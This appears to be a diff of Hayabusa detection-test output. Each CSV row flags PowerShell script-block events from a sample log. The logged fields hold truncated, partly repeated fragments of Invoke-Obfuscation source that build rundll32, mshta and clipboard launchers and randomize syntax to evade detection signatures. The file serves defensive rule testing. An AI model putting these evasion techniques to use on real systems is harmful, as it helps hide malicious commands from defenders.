Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # Since we're embedding $PowerShellClip syntax one more process deep we need to double-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""^$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""^$Char"",""^^^$Char"") } } # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PsCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 11 { ############## ## RUNDLL++ ## ############## # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. $Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$InvokeOption`"""" $RundllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToRunDll + $RundllCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToRunDll , $RundllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 12 { ############# ## MSHTA++ ## ############# # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. # Keep calling Out-RandomInvokeRandomEnvironmentVariableSyntax until we get the shorter syntax (not using $ExecutionContext syntax) since mshta.exe has a short argument size limitation. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') While($InvokeOption.Length -gt 200) { $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') } # Generate randomize case syntax for all available command arguments for mshta.exe. $CreateObject = ([Char[]]'VBScript:CreateObject' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WScriptShell = ([Char[]]'WScript.Shell' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Run = ([Char[]]'.Run' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $TrueString = ([Char[]]'True' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WindowClose = ([Char[]]'Window.Close' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomly decide whether to concatenate WScript.Shell or just encapsulate it with double quotes. If((Get-Random -Input @(0..1)) -eq 0) { $WScriptShell = Out-ConcatenatedString $WScriptShell '""' } Else { $WScriptShell = '""' + $WScriptShell + '""' } # Randomly decide whether or not to concatenate PowerShell command. If((Get-Random -Input @(0..1)) -eq 0) { # Concatenate $InvokeOption and unescape double quotes from the result. $SubStringArray += (Out-ConcatenatedString $InvokeOption.Trim('""') '""').Replace('`""','""') # Remove concatenation introduced in above step if it concatenates immediately after a cmd.exe escape character. If($InvokeOption.Contains('^""+""')) { $InvokeOption = $InvokeOption.Replace('^""+""','^') } } # Random choose between using the numeral 1 and using a random subtraction syntax that is equivalent to 1. If((Get-Random -Input @(0..1)) -eq 0) { $One = 1 } Else { # Randomly select between two digit and three digit subtraction syntax. $RandomNumber = Get-Random -Minimum 3 -Maximum 25 If(Get-Random -Input @(0..1)) { $One = [String]$RandomNumber + '-' + ($RandomNumber-1) } Else { $SecondRandomNumber = Get-Random -Minimum 1 -Maximum $RandomNumber $One = [String]$RandomNumber + '-' + $SecondRandomNumber + '-' + ($RandomNumber-$SecondRandomNumber-1) } # Randomly decide to encapsulate with parentheses (not necessary). If((Get-Random -Input @(0..1)) -eq 0) { $One = '(' + $One + ')' } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption + '"",' + $One + ',' + $TrueString + "")($WindowClose)"" $MshtaCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $CreateObject + ""($WScriptShell)"" + $Run + '(""' + $PathToPowerShell + $PSCmdSyntax + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToMshta + $MshtaCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToMshta , $MshtaCmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } default {Write-Error ""An invalid `$LaunchType value ($LaunchType) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } # Output process tree output format of applied launcher to help the Blue Team find indicators and the Red Team to better avoid detection. If($ArgsDefenderWillSee.Count -gt 0) { Write-Host ""`n`nProcess Argument Tree of ObfuscatedCommand with current launcher:"" $Counter = -1 ForEach($Line in $ArgsDefenderWillSee) { If($Line.Count -gt 1) { $Part1 = $Line[0] $Part2 = $Line[1] } Else { $Part1 = $Line $Part2 = '' } $LineSpacing = '' If($Counter -ge 0) { $LineSpacing = ' '*$Counter Write-Host ""$LineSpacing|`n$LineSpacing\--> "" -NoNewline } # Print each command and argument, handling if the argument length is too long to display coherently. Write-Host $Part1 -NoNewLine -ForegroundColor Yellow # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 If($Part2.Length -gt $CmdMaxLength) { # Output Part2, handling if the size of Part2 exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = ""<REDACTED: ArgumentLength = $($Part1.Length + $Part2.Length)>"" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ($Part1.Length+$LineSpacing.Length) $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $Part2.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Cyan Write-Host $RedactionMessage -NoNewLine -ForegroundColor Magenta Write-Host $Part2.SubString($Part2.Length-$RedactedPrintLength) -ForegroundColor Cyan } Else { Write-Host $Part2 -ForegroundColor Cyan } $Counter++ } Start-Sleep 1 } # Make sure final command doesn't exceed cmd.exe's character limit. # Only apply this check to LaunchType values less than 13 since all the other launchers are not command line launchers. $CmdMaxLength = 8190 If(($CmdLineOutput.Length -gt $CmdMaxLength) -AND ($LaunchType -lt 13)) { Write-Host """" Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" Start-Sleep 1 } Return $CmdLineOutput } Function Out-RandomInvokeRandomEnvironmentVariableSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized syntax for invoking a process-level environment variable. Invoke-Obfuscation Function: Out-RandomInvokeRandomEnvironmentVariableSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomInvokeRandomEnvironmentVariableSyntax generates random invoke syntax and random process-level environment variable retrieval syntax for invoking command contents that are stored in a user-input process-level environment variable. This function is primarily used as a helper function for Out-PowerShellLauncher. .PARAMETER EnvVarName User input string or array of strings containing environment variable names to randomly select and apply invoke syntax. .EXAMPLE C:\PS> Out-RandomInvokeRandomEnvironmentVariableSyntax 'varname' .(\""In\"" +\""v\"" + \""o\""+ \""Ke-ExpRes\""+ \""sION\"" ) (^&( \""GC\"" +\""i\"" ) eNV:vaRNAMe ).\""V`ALue\"" .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options wher",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$InvokeOption`"""" $RundllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToRunDll + $RundllCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToRunDll , $RundllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 12 { ############# ## MSHTA++ ## ############# # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. # Keep calling Out-RandomInvokeRandomEnvironmentVariableSyntax until we get the shorter syntax (not using $ExecutionContext syntax) since mshta.exe has a short argument size limitation. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') While($InvokeOption.Length -gt 200) { $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') } # Generate randomize case syntax for all available command arguments for mshta.exe. $CreateObject = ([Char[]]'VBScript:CreateObject' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WScriptShell = ([Char[]]'WScript.Shell' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Run = ([Char[]]'.Run' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $TrueString = ([Char[]]'True' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WindowClose = ([Char[]]'Window.Close' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomly decide whether to concatenate WScript.Shell or just encapsulate it with double quotes. If((Get-Random -Input @(0..1)) -eq 0) { $WScriptShell = Out-ConcatenatedString $WScriptShell '""' } Else { $WScriptShell = '""' + $WScriptShell + '""' } # Randomly decide whether or not to concatenate PowerShell command. If((Get-Random -Input @(0..1)) -eq 0) { # Concatenate $InvokeOption and unescape double quotes from the result. $SubStringArray += (Out-ConcatenatedString $InvokeOption.Trim('""') '""').Replace('`""','""') # Remove concatenation introduced in above step if it concatenates immediately after a cmd.exe escape character. If($InvokeOption.Contains('^""+""')) { $InvokeOption = $InvokeOption.Replace('^""+""','^') } } # Random choose between using the numeral 1 and using a random subtraction syntax that is equivalent to 1. If((Get-Random -Input @(0..1)) -eq 0) { $One = 1 } Else { # Randomly select between two digit and three digit subtraction syntax. $RandomNumber = Get-Random -Minimum 3 -Maximum 25 If(Get-Random -Input @(0..1)) { $One = [String]$RandomNumber + '-' + ($RandomNumber-1) } Else { $SecondRandomNumber = Get-Random -Minimum 1 -Maximum $RandomNumber $One = [String]$RandomNumber + '-' + $SecondRandomNumber + '-' + ($RandomNumber-$SecondRandomNumber-1) } # Randomly decide to encapsulate with parentheses (not necessary). If((Get-Random -Input @(0..1)) -eq 0) { $One = '(' + $One + ')' } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption + '"",' + $One + ',' + $TrueString + "")($WindowClose)"" $MshtaCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $CreateObject + ""($WScriptShell)"" + $Run + '(""' + $PathToPowerShell + $PSCmdSyntax + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToMshta + $MshtaCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToMshta , $MshtaCmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } default {Write-Error ""An invalid `$LaunchType value ($LaunchType) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } # Output process tree output format of applied launcher to help the Blue Team find indicators and the Red Team to better avoid detection. If($ArgsDefenderWillSee.Count -gt 0) { Write-Host ""`n`nProcess Argument Tree of ObfuscatedCommand with current launcher:"" $Counter = -1 ForEach($Line in $ArgsDefenderWillSee) { If($Line.Count -gt 1) { $Part1 = $Line[0] $Part2 = $Line[1] } Else { $Part1 = $Line $Part2 = '' } $LineSpacing = '' If($Counter -ge 0) { $LineSpacing = ' '*$Counter Write-Host ""$LineSpacing|`n$LineSpacing\--> "" -NoNewline } # Print each command and argument, handling if the argument length is too long to display coherently. Write-Host $Part1 -NoNewLine -ForegroundColor Yellow # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 If($Part2.Length -gt $CmdMaxLength) { # Output Part2, handling if the size of Part2 exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = ""<REDACTED: ArgumentLength = $($Part1.Length + $Part2.Length)>"" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ($Part1.Length+$LineSpacing.Length) $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $Part2.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Cyan Write-Host $RedactionMessage -NoNewLine -ForegroundColor Magenta Write-Host $Part2.SubString($Part2.Length-$RedactedPrintLength) -ForegroundColor Cyan } Else { Write-Host $Part2 -ForegroundColor Cyan } $Counter++ } Start-Sleep 1 } # Make sure final command doesn't exceed cmd.exe's character limit. # Only apply this check to LaunchType values less than 13 since all the other launchers are not command line launchers. $CmdMaxLength = 8190 If(($CmdLineOutput.Length -gt $CmdMaxLength) -AND ($LaunchType -lt 13)) { Write-Host """" Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" Start-Sleep 1 } Return $CmdLineOutput } Function Out-RandomInvokeRandomEnvironmentVariableSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized syntax for invoking a process-level environment variable. Invoke-Obfuscation Function: Out-RandomInvokeRandomEnvironmentVariableSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomInvokeRandomEnvironmentVariableSyntax generates random invoke syntax and random process-level environment variable retrieval syntax for invoking command contents that are stored in a user-input process-level environment variable. This function is primarily used as a helper function for Out-PowerShellLauncher. .PARAMETER EnvVarName User input string or array of strings containing environment variable names to randomly select and apply invoke syntax. .EXAMPLE C:\PS> Out-RandomInvokeRandomEnvironmentVariableSyntax 'varname' .(\""In\"" +\""v\"" + \""o\""+ \""Ke-ExpRes\""+ \""sION\"" ) (^&( \""GC\"" +\""i\"" ) eNV:vaRNAMe ).\""V`ALue\"" .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options wher",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"e the PowerShell command is set in process-level environment variables for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String[]] $EnvVarName ) # Retrieve random variable from variable name array passed in as argument. $EnvVarName = Get-Random -Input $EnvVarName # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $EnvVarName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$EnvVarName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetRandomVariableSyntax If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random invoke operation through the appropriate token obfuscators if $PowerShellStdIn is not simply a value of - from above random options. 